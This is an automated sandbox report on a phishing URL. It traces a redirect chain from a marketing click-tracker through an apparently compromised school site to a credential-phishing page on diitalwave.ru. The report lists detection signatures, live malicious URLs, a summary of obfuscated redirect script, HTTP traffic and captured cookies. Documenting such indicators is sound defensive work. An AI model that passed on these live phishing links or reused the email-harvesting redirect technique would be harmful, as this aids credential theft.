Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFq

Overview

General Information

Sample URL:https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfll
Analysis ID:1572611
Infos:

Detection

Captcha Phish
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected Captcha Phish
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 7148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2196,i,4873192143124147260,2369863253724032134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 1008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.3.pages.csvJoeSecurity_CaptchaPhish_2Yara detected Captcha PhishJoe Security
    2.2.pages.csvJoeSecurity_CaptchaPhish_2Yara detected Captcha PhishJoe Security
      2.1.pages.csvJoeSecurity_CaptchaPhish_2Yara detected Captcha PhishJoe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
        Source: https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/Avira URL Cloud: Label: phishing
        Source: https://tafaruqueschoolandcollege.gov.bd/favicon.icoAvira URL Cloud: Label: malware
        Source: https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.htmlAvira URL Cloud: Label: malware
        Source: https://0hXj.diitalwave.ru/HvdnqK-qqvXHs/#XAvira URL Cloud: Label: phishing

        Phishing

        barindex
        Source: https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/#Xtest%40test.comJoe Sandbox AI: Score: 7 Reasons: The URL '0hxj.diitalwave.ru' does not match any known legitimate domain associated with a well-known brand., The domain 'diitalwave.ru' appears suspicious due to the misspelling of 'digital' as 'diital'., The use of a subdomain '0hxj' is unusual and could be an attempt to obfuscate the true nature of the site., The brand 'u' is not recognized and does not provide any clear association with a known or well-known brand., The domain extension '.ru' is not inherently suspicious but should be considered in the context of the other factors., The lack of a clear brand association and the suspicious elements in the URL suggest a high risk of phishing. DOM: 2.3.pages.csv
        Source: Yara matchFile source: 2.3.pages.csv, type: HTML
        Source: Yara matchFile source: 2.2.pages.csv, type: HTML
        Source: Yara matchFile source: 2.1.pages.csv, type: HTML
        Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://tafaruqueschoolandcollege.gov.bd/cgi-admin... The script redirects users to a suspicious domain (diitalwave.ru) with potential data exfiltration by appending email parameters to the URL. This behavior is indicative of malicious intent, especially given the use of an untrusted domain.
        Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/#Xtest%40... The script uses obfuscated code with base64 encoding, which is a high-risk indicator (+3 points). It also includes a dynamic code execution check using 'atob', which is another high-risk indicator (+3 points). The script attempts to load an external script from 'code.jquery.com', a trusted domain, but the obfuscation and potential for dynamic execution suggest suspicious behavior. No clear malicious intent is evident, but the obfuscation and dynamic checks warrant a high-risk score.
        Source: https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/#Xtest%40test.comHTTP Parser: Base64 decoded: https://x0oLmjiZMmCFIng71i3QZiGmPpgpP4p3Y2sb854SyWkLmDaSnAhd.ssbvteke.ru/cxsvlcmavsezuwhehpsavznpnNIrJJrMtrNJCWWJFEMYMDEDKJVPCHQJVHFZQGHZDDWWAPXQOCGIRXHITCSKUS
        Source: https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comSample URL: PII: test@test.com
        Source: https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/#Xtest%40test.comHTTP Parser: No favicon
        Source: https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/#Xtest%40test.comHTTP Parser: No favicon
        Source: https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/#Xtest%40test.comHTTP Parser: No favicon
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: clickme.thryv.com to https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.html
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 40.81.94.65
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D HTTP/1.1Host: clickme.thryv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cgi-admin/54321.html HTTP/1.1Host: tafaruqueschoolandcollege.gov.bdConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: tafaruqueschoolandcollege.gov.bdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tafaruqueschoolandcollege.gov.bd/cgi-admin/54321.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /HvdnqK-qqvXHs/ HTTP/1.1Host: 0hxj.diitalwave.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://tafaruqueschoolandcollege.gov.bd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://0hxj.diitalwave.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0hxj.diitalwave.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 0hxj.diitalwave.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im4rYjdCYzFBRzNmVUJhRlh6SXpCOUE9PSIsInZhbHVlIjoiSmt4YmRVMWVxV1dPakI3SExxNFNKWko4UXRCWDZmdGFjT3g4WHVhZm4yUWZOZEFOc1l0ZWpSc0E0cjExOGZzc0RtN0p2YnNDVUdPbDlSbXBpZnhZNzRTYU51WXV1MGwzRG9GeEdLODdncmRqdVF5cldLZmtEUXFHQTNXcHhtM2ciLCJtYWMiOiJiZmMzZGZlZWFlZmE1ZWEzNzM1M2ZmMzIzODc3Mzg0NjI0NDRiYmQzYzk3MDZmNDQwY2ViNWMyNWVmZGFiYzRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InRiWGxETFltYUxRVFFQNE9yaVArTkE9PSIsInZhbHVlIjoiNUc3ZDhCdnhiWHUxTEo1WTdNZVhVNTAvVDhxQ0hlaFo1UUs5dGdiLzZoYVV3eHRJbCtrbXJVQXpLaW8zQjIvRTdRNmM0ZFlVeWN0Vk5ZTC9BSG1oa0YxNGtFdmtHb05adlRteXdnSWdyYnFsVUVxOTlTa3pMRFdPb3g5U05EY0giLCJtYWMiOiJkMjBlNjE0NTZkOTZjY2YwNTk2YWU5NzUzZmY3NWY1NjQ4MDc5MTNhYmI2MzBjYTcxMzU5MzQ0MjUwMWUyYWY1IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: clickme.thryv.com
        Source: global trafficDNS traffic detected: DNS query: tafaruqueschoolandcollege.gov.bd
        Source: global trafficDNS traffic detected: DNS query: 0hxj.diitalwave.ru
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: blogger.googleusercontent.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: unknownHTTP traffic detected: POST /report/v4?s=TybKBgNVIdxCBkWTAgN3cvFtR2YstHTHIKVnBVGvu%2BkbKjPS8VvWTOFynCRaRfMXM9JxnNipYKJoSwxmEJfPaeTP%2FweuMudZWGHPsIEO97ivhO%2BhNUkB94sSw2PWUQ%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 441Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 10 Dec 2024 17:13:11 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:13:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 3153Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TybKBgNVIdxCBkWTAgN3cvFtR2YstHTHIKVnBVGvu%2BkbKjPS8VvWTOFynCRaRfMXM9JxnNipYKJoSwxmEJfPaeTP%2FweuMudZWGHPsIEO97ivhO%2BhNUkB94sSw2PWUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1396&rtt_var=204&sent=25&recv=22&lost=0&retrans=0&sent_bytes=23718&recv_bytes=2680&delivery_rate=6946125&cwnd=257&unsent_bytes=0&cid=b6a768cf05bc02b2&ts=17967&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8efedd7139bc43fb-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1792&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1907&delivery_rate=1617728&cwnd=180&unsent_bytes=0&cid=99d8f212b83adcbc&ts=8264&x=0"
        Source: chromecache_48.3.drString found in binary or memory: https://0hXj.diitalwave.ru/HvdnqK-qqvXHs/#X
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
        Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: classification engineClassification label: mal76.phis.win@18/12@18/10
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2196,i,4873192143124147260,2369863253724032134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2196,i,4873192143124147260,2369863253724032134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
